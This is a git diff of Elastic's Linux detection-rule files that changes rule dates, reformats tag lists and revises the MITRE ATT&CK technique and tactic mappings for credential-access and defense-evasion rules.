@@ -110,6 +110,11 @@ id = "T1110.001" name = "Password Guessing" reference = "https://attack.mitre.org/techniques/T1110/001/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml index ef52de06f44..020628dd4f9 100644 --- a/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml +++ b/rules/linux/credential_access_potential_linux_ssh_bruteforce_internal.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/21" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -106,6 +106,11 @@ id = "T1110.001" name = "Password Guessing" reference = "https://attack.mitre.org/techniques/T1110/001/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_potential_password_spraying_attack.toml b/rules/linux/credential_access_potential_password_spraying_attack.toml index d29948322d0..711c7bd6fae 100644 --- a/rules/linux/credential_access_potential_password_spraying_attack.toml +++ b/rules/linux/credential_access_potential_password_spraying_attack.toml @@ -2,7 +2,7 @@ creation_date = "2025/12/24" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/12" [rule] author = ["Elastic"] @@ -111,6 +111,11 @@ id = "T1110" name = "Brute Force" reference = "https://attack.mitre.org/techniques/T1110/" +[[rule.threat.technique.subtechnique]] +id = "T1110.001" +name = "Password Guessing" +reference = "https://attack.mitre.org/techniques/T1110/001/" + [[rule.threat.technique.subtechnique]] id = "T1110.003" name = "Password Spraying" diff --git a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml index f8019adac53..8f8c9f7c185 100644 --- a/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml +++ b/rules/linux/credential_access_potential_successful_linux_ssh_bruteforce.toml @@ -2,7 +2,7 @@ creation_date = "2022/09/14" integration = ["system"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -108,6 +108,11 @@ id = "T1110.001" name = "Password Guessing" reference = "https://attack.mitre.org/techniques/T1110/001/" +[[rule.threat.technique.subtechnique]] +id = "T1110.003" +name = "Password Spraying" +reference = "https://attack.mitre.org/techniques/T1110/003/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_proc_credential_dumping.toml b/rules/linux/credential_access_proc_credential_dumping.toml index f98a1a25d33..f543e3ff547 100644 --- a/rules/linux/credential_access_proc_credential_dumping.toml +++ b/rules/linux/credential_access_proc_credential_dumping.toml @@ -2,7 +2,7 @@ creation_date = "2023/04/26" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -122,6 +122,11 @@ id = "T1003.007" name = "Proc Filesystem" reference = "https://attack.mitre.org/techniques/T1003/007/" +[[rule.threat.technique]] +id = "T1212" +name = "Exploitation for Credential Access" +reference = "https://attack.mitre.org/techniques/T1212/" + [rule.threat.tactic] id = "TA0006" name = "Credential Access" diff --git a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml index 0085884fa66..0b636c1f0b6 100644 --- a/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml +++ b/rules/linux/credential_access_sensitive_keys_or_passwords_search_inside_container.toml @@ -2,7 +2,7 @@ creation_date = "2025/03/12" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -46,7 +46,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Container", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Tactic: Discovery", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Container", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -110,16 +117,3 @@ reference = "https://attack.mitre.org/techniques/T1552/001/" id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1083" -name = "File and Directory Discovery" -reference = "https://attack.mitre.org/techniques/T1083/" - -[rule.threat.tactic] -id = "TA0007" -name = "Discovery" -reference = "https://attack.mitre.org/tactics/TA0007/" diff --git a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml index d214945e6b9..feb93587467 100644 --- a/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml +++ b/rules/linux/credential_access_ssh_password_grabbing_via_strace.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/10" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/24" [rule] author = ["Elastic"] @@ -56,7 +56,15 @@ references = [ risk_score = 47 rule_id = "9eaa3fb1-3f70-48ed-bb0e-d7ae4d3c8f28" severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Credential Access", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Credential Access", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -69,11 +77,24 @@ sequence by host.id with maxspan=3s framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1056" -name = "Input Capture" -reference = "https://attack.mitre.org/techniques/T1056/" +id = "T1556" +name = "Modify Authentication Process" +reference = "https://attack.mitre.org/techniques/T1556/" [rule.threat.tactic] id = "TA0006" name = "Credential Access" reference = "https://attack.mitre.org/tactics/TA0006/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1554" +name = "Compromise Host Software Binary" +reference = "https://attack.mitre.org/techniques/T1554/" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_apparmor_policy_violation.toml b/rules/linux/defense_evasion_apparmor_policy_violation.toml index ba81a129497..0bdc8dd8329 100644 --- a/rules/linux/defense_evasion_apparmor_policy_violation.toml +++ b/rules/linux/defense_evasion_apparmor_policy_violation.toml @@ -2,7 +2,7 @@ creation_date = "2026/03/20" integration = ["auditd_manager"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/03/20" [rule] author = ["Elastic"] @@ -96,6 +96,11 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml index 729612e6179..6b076f4a605 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml +++ b/rules/linux/defense_evasion_attempt_to_disable_auditd_service.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/28" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -115,9 +115,9 @@ name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1562.012" -name = "Disable or Modify Linux Audit System" -reference = "https://attack.mitre.org/techniques/T1562/012/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml index 13326263087..f1d091298b1 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml +++ b/rules/linux/defense_evasion_attempt_to_disable_iptables_or_firewall.toml @@ -2,7 +2,7 @@ creation_date = "2023/02/22" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -123,9 +123,9 @@ name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" [[rule.threat.technique.subtechnique]] -id = "T1562.004" -name = "Disable or Modify System Firewall" -reference = "https://attack.mitre.org/techniques/T1562/004/" +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" [rule.threat.tactic] id = "TA0005" diff --git a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml index 3b30d99c0cd..716db12a621 100644 --- a/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml +++ b/rules/linux/defense_evasion_attempt_to_disable_syslog_service.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/27" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -132,6 +132,11 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml index 0f03df2bf50..b1c2b0ae4e9 100644 --- a/rules/linux/defense_evasion_authorized_keys_file_deletion.toml +++ b/rules/linux/defense_evasion_authorized_keys_file_deletion.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -80,7 +80,14 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Impact", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -98,11 +105,16 @@ not ( framework = "MITRE ATT&CK" [[rule.threat.technique]] -id = "T1531" -name = "Account Access Removal" -reference = "https://attack.mitre.org/techniques/T1531/" +id = "T1070" +name = "Indicator Removal" +reference = "https://attack.mitre.org/techniques/T1070/" + +[[rule.threat.technique.subtechnique]] +id = "T1070.004" +name = "File Deletion" +reference = "https://attack.mitre.org/techniques/T1070/004/" [rule.threat.tactic] -id = "TA0040" -name = "Impact" -reference = "https://attack.mitre.org/tactics/TA0040/" +id = "TA0005" +name = "Defense Evasion" +reference = "https://attack.mitre.org/tactics/TA0005/" diff --git a/rules/linux/defense_evasion_base64_decoding_activity.toml b/rules/linux/defense_evasion_base64_decoding_activity.toml index 2374ff50bea..375a8b62e4e 100644 --- a/rules/linux/defense_evasion_base64_decoding_activity.toml +++ b/rules/linux/defense_evasion_base64_decoding_activity.toml @@ -2,7 +2,7 @@ creation_date = "2025/02/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/01/16" [rule] author = ["Elastic"] @@ -173,6 +173,11 @@ from logs-endpoint.events.process-* metadata _id, _index, _version [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" @@ -182,3 +187,31 @@ reference = "https://attack.mitre.org/techniques/T1140/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml b/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml index 315be4335f6..2a3b2c93dca 100644 --- a/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml +++ b/rules/linux/defense_evasion_binary_copied_to_suspicious_directory.toml @@ -2,7 +2,7 @@ creation_date = "2023/08/29" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -119,6 +119,11 @@ id = "T1036.003" name = "Rename Legitimate Utilities" reference = "https://attack.mitre.org/techniques/T1036/003/" +[[rule.threat.technique]] +id = "T1564" +name = "Hide Artifacts" +reference = "https://attack.mitre.org/techniques/T1564/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_bpf_program_tampering.toml b/rules/linux/defense_evasion_bpf_program_tampering.toml index 50f16c631cf..f23dcdf2669 100644 --- a/rules/linux/defense_evasion_bpf_program_tampering.toml +++ b/rules/linux/defense_evasion_bpf_program_tampering.toml @@ -2,7 +2,7 @@ creation_date = "2026/02/20" integration = ["endpoint", "auditd_manager", "sentinel_one_cloud_funnel", "crowdstrike"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2026/02/20" [rule] author = ["Elastic"] @@ -99,6 +99,11 @@ id = "T1562.001" name = "Disable or Modify Tools" reference = "https://attack.mitre.org/techniques/T1562/001/" +[[rule.threat.technique]] +id = "T1014" +name = "Rootkit" +reference = "https://attack.mitre.org/techniques/T1014/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml b/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml index 736eb093333..b3f77d4cefc 100644 --- a/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml +++ b/rules/linux/defense_evasion_clear_kernel_ring_buffer.toml @@ -2,7 +2,7 @@ creation_date = "2023/10/24" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -117,6 +117,16 @@ id = "T1070.002" name = "Clear Linux or Mac System Logs" reference = "https://attack.mitre.org/techniques/T1070/002/" +[[rule.threat.technique]] +id = "T1562" +name = "Impair Defenses" +reference = "https://attack.mitre.org/techniques/T1562/" + +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml index 8e8fee50ff4..05fae4d0549 100644 --- a/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml +++ b/rules/linux/defense_evasion_curl_or_wget_executed_via_lolbin.toml @@ -2,7 +2,7 @@ creation_date = "2025/11/20" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/11/24" [rule] author = ["Elastic"] @@ -77,7 +77,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Command and Control", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Tactic: Command and Control", + "Tactic: Exfiltration", + "Data Source: Elastic Defend", + "Resources: Investigation Guide", +] type = "eql" query = ''' sequence with maxspan=3s @@ -134,25 +144,46 @@ sequence with maxspan=3s [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1105" -name = "Ingress Tool Transfer" -reference = "https://attack.mitre.org/techniques/T1105/" + [rule.threat.tactic] + name = "Defense Evasion" + id = "TA0005" + reference = "https://attack.mitre.org/tactics/TA0005/" -[rule.threat.tactic] -id = "TA0011" -name = "Command and Control" -reference = "https://attack.mitre.org/tactics/TA0011/" + [[rule.threat.technique]] + id = "T1218" + name = "System Binary Proxy Execution" + reference = "https://attack.mitre.org/techniques/T1218/" [[rule.threat]] framework = "MITRE ATT&CK" -[[rule.threat.technique]] -id = "T1218" -name = "System Binary Proxy Execution" -reference = "https://attack.mitre.org/techniques/T1218/" + [rule.threat.tactic] + name = "Execution" + id = "TA0002" + reference = "https://attack.mitre.org/tactics/TA0002/" -[rule.threat.tactic] -id = "TA0005" -name = "Defense Evasion" -reference = "https://attack.mitre.org/tactics/TA0005/" + [[rule.threat.technique]] + id = "T1059" + name = "Command and Scripting Interpreter" + reference = "https://attack.mitre.org/techniques/T1059/" + + [[rule.threat.technique.subtechnique]] + name = "Unix Shell" + id = "T1059.004" + reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + id = "TA0011" + name = "Command and Control" + reference = "https://attack.mitre.org/tactics/TA0011/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + + [rule.threat.tactic] + id = "TA0010" + name = "Exfiltration" + reference = "https://attack.mitre.org/tactics/TA0010/" diff --git a/rules/linux/defense_evasion_directory_creation_in_bin.toml b/rules/linux/defense_evasion_directory_creation_in_bin.toml index 061fea69f52..450965c1864 100644 --- a/rules/linux/defense_evasion_directory_creation_in_bin.toml +++ b/rules/linux/defense_evasion_directory_creation_in_bin.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/01" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -83,7 +83,18 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Persistence", + "Data Source: Elastic Defend", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -111,3 +122,11 @@ reference = "https://attack.mitre.org/techniques/T1564/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_disable_selinux_attempt.toml b/rules/linux/defense_evasion_disable_selinux_attempt.toml index c2cbb5316e5..b6e65ea7aca 100644 --- a/rules/linux/defense_evasion_disable_selinux_attempt.toml +++ b/rules/linux/defense_evasion_disable_selinux_attempt.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/22" integration = ["endpoint", "auditd_manager", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -125,6 +125,11 @@ id = "T1562" name = "Impair Defenses" reference = "https://attack.mitre.org/techniques/T1562/" +[[rule.threat.technique.subtechnique]] +id = "T1562.001" +name = "Disable or Modify Tools" +reference = "https://attack.mitre.org/techniques/T1562/001/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" diff --git a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml index ea2413b54ff..8f0a8af6a0e 100644 --- a/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml +++ b/rules/linux/defense_evasion_doas_configuration_creation_or_rename.toml @@ -2,7 +2,7 @@ creation_date = "2024/08/28" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -79,7 +79,16 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "medium" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Tactic: Privilege Escalation", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -94,20 +103,12 @@ id = "T1548" name = "Abuse Elevation Control Mechanism" reference = "https://attack.mitre.org/techniques/T1548/" +[[rule.threat.technique.subtechnique]] +id = "T1548.003" +name = "Sudo and Sudo Caching" +reference = "https://attack.mitre.org/techniques/T1548/003/" + [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" - -[[rule.threat]] -framework = "MITRE ATT&CK" - -[[rule.threat.technique]] -id = "T1548" -name = "Abuse Elevation Control Mechanism" -reference = "https://attack.mitre.org/techniques/T1548/" - -[rule.threat.tactic] -id = "TA0004" -name = "Privilege Escalation" -reference = "https://attack.mitre.org/tactics/TA0004/" diff --git a/rules/linux/defense_evasion_file_mod_writable_dir.toml b/rules/linux/defense_evasion_file_mod_writable_dir.toml index 5fe58a162db..b838709d6db 100644 --- a/rules/linux/defense_evasion_file_mod_writable_dir.toml +++ b/rules/linux/defense_evasion_file_mod_writable_dir.toml @@ -2,7 +2,7 @@ creation_date = "2020/04/21" integration = ["endpoint"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -131,15 +131,11 @@ id = "T1222" name = "File and Directory Permissions Modification" reference = "https://attack.mitre.org/techniques/T1222/" -[[rule.threat.technique.subtechnique]] -id = "T1222.002" -name = "Linux and Mac File and Directory Permissions Modification" -reference = "https://attack.mitre.org/techniques/T1222/002/" - [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + [rule.new_terms] field = "new_terms_fields" value = ["host.id", "process.parent.executable", "process.command_line"] diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml index 7091c85fb0f..96000cee0bf 100644 --- a/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml +++ b/rules/linux/defense_evasion_hex_payload_execution_via_commandline.toml @@ -2,7 +2,7 @@ creation_date = "2025/04/29" integration = ["auditd_manager", "crowdstrike", "endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -84,7 +84,19 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Auditd Manager", "Data Source: Elastic Defend", "Data Source: Elastic Endgame", "Data Source: Crowdstrike", "Data Source: SentinelOne", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Tactic: Execution", + "Data Source: Auditd Manager", + "Data Source: Elastic Defend", + "Data Source: Elastic Endgame", + "Data Source: Crowdstrike", + "Data Source: SentinelOne", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -104,12 +116,40 @@ id = "T1027" name = "Obfuscated Files or Information" reference = "https://attack.mitre.org/techniques/T1027/" -[[rule.threat.technique.subtechnique]] -id = "T1027.010" -name = "Command Obfuscation" -reference = "https://attack.mitre.org/techniques/T1027/010/" +[[rule.threat.technique]] +id = "T1140" +name = "Deobfuscate/Decode Files or Information" +reference = "https://attack.mitre.org/techniques/T1140/" [rule.threat.tactic] id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[[rule.threat.technique]] +id = "T1059" +name = "Command and Scripting Interpreter" +reference = "https://attack.mitre.org/techniques/T1059/" + +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + +[rule.threat.tactic] +id = "TA0002" +name = "Execution" +reference = "https://attack.mitre.org/tactics/TA0002/" diff --git a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml index ff3937346a6..62bddb86804 100644 --- a/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml +++ b/rules/linux/defense_evasion_hex_payload_execution_via_utility.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/04" integration = ["endpoint", "crowdstrike", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/17" [rule] author = ["Elastic"] @@ -128,6 +128,11 @@ not ( [[rule.threat]] framework = "MITRE ATT&CK" +[[rule.threat.technique]] +id = "T1027" +name = "Obfuscated Files or Information" +reference = "https://attack.mitre.org/techniques/T1027/" + [[rule.threat.technique]] id = "T1140" name = "Deobfuscate/Decode Files or Information" @@ -146,6 +151,21 @@ id = "T1059" name = "Command and Scripting Interpreter" reference = "https://attack.mitre.org/techniques/T1059/" +[[rule.threat.technique.subtechnique]] +id = "T1059.004" +name = "Unix Shell" +reference = "https://attack.mitre.org/techniques/T1059/004/" + +[[rule.threat.technique]] +id = "T1204" +name = "User Execution" +reference = "https://attack.mitre.org/techniques/T1204/" + +[[rule.threat.technique.subtechnique]] +id = "T1204.002" +name = "Malicious File" +reference = "https://attack.mitre.org/techniques/T1204/002/" + [rule.threat.tactic] id = "TA0002" name = "Execution" diff --git a/rules/linux/defense_evasion_hidden_directory_creation.toml b/rules/linux/defense_evasion_hidden_directory_creation.toml index aaaaf7ab199..59a908829de 100644 --- a/rules/linux/defense_evasion_hidden_directory_creation.toml +++ b/rules/linux/defense_evasion_hidden_directory_creation.toml @@ -2,7 +2,7 @@ creation_date = "2024/11/01" integration = ["endpoint", "sentinel_one_cloud_funnel"] maturity = "production" -updated_date = "2026/03/23" +updated_date = "2025/12/18" [rule] author = ["Elastic"] @@ -85,7 +85,17 @@ For more details on Elastic Agent configuration settings, refer to the [helper g For more details on Elastic Defend refer to the [helper guide](https://www.elastic.co/guide/en/security/current/install-endpoint.html). """ severity = "low" -tags = ["Domain: Endpoint", "OS: Linux", "Use Case: Threat Detection", "Tactic: Defense Evasion", "Data Source: Elastic Defend", "Data Source: SentinelOne", "Data Source: Elastic Endgame", "Resources: Investigation Guide"] +tags = [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Defense Evasion", + "Data Source: Elastic Defend", + "Tactic: Persistence", + "Data Source: SentinelOne", + "Data Source: Elastic Endgame", + "Resources: Investigation Guide", +] timestamp_override = "event.ingested" type = "eql" query = ''' @@ -121,3 +131,11 @@ reference = "https://attack.mitre.org/techniques/T1564/001/" id = "TA0005" name = "Defense Evasion" reference = "https://attack.mitre.org/tactics/TA0005/" + +[[rule.threat]] +framework = "MITRE ATT&CK" + +[rule.threat.tactic] +id = "TA0003" +name = "Persistence" +reference = "https://attack.mitre.org/tactics/TA0003/" diff --git a/rules/linux/defense_evasion_hidden_file_dir_tmp.toml 